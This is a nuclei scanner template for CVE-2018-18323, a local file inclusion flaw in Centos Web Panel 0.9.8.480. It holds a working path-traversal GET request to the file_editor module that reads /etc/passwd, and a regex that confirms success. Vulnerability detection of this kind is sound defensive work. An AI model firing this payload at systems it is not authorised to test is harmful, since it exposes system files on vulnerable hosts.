nuclei-templates/cves/2018/CVE-2018-18323.yaml

38 lines
1.1 KiB
YAML

id: CVE-2018-18323
info:
name: Centos Web Panel 0.9.8.480 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.
reference:
- https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
- http://centos-webpanel.com/
- https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2018-18323
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-18323
cwe-id: CWE-22
tags: cve,cve2018,centos,lfi,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/17